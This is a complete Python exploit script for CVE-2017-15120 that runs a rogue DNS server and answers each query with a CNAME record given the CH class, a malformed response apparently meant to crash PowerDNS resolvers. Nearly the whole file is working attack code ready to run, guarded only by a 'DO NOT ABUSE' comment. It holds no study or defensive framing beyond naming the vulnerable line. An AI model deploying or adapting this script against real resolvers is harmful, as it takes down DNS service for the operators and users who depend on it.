#!/usr/local/bin/python3.6
#CVE-2017-15120 exploit.
#DO NOT ABUSE !!!

import socket

#pip install dnslib
from dnslib import RR, DNSHeader, DNSRecord, QTYPE, CNAME, CLASS


class PDNSKiller():

    def __init__(self, ipaddr):
        self.host = ipaddr
        self.port = 53

    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind((self.host, self.port))

        print("PDNS Killer Started.")

        while True:
            msg, (cliHost, cliPort) = sock.recvfrom(8096)
            print("Received DNS Packet. Client:" + str(cliHost) + ":" + str(cliPort))
            responseData = self.craftPayload(msg)

            if responseData is not None:
                sock.sendto(responseData, (cliHost, cliPort))

    def craftPayload(self, msg):

        query = DNSRecord.parse(msg)
        response = query.reply()

        qname = self.getQname(query)
        cnamerr = RR(qname, QTYPE.CNAME, ttl=60, rdata=CNAME("example.com."))

        #vuln point.
        cnamerr.rclass = CLASS.CH

        response.add_answer(cnamerr)

        if response.__class__.__name__ == "DNSRecord":
            print("===============================")
            print(response)
            print("===============================")
            return response.pack()
        else:
            return None

    def getQname(self, query):
        return str(query.q.qname)


if __name__ == '__main__':
    srv = PDNSKiller("0.0.0.0")
    srv.run()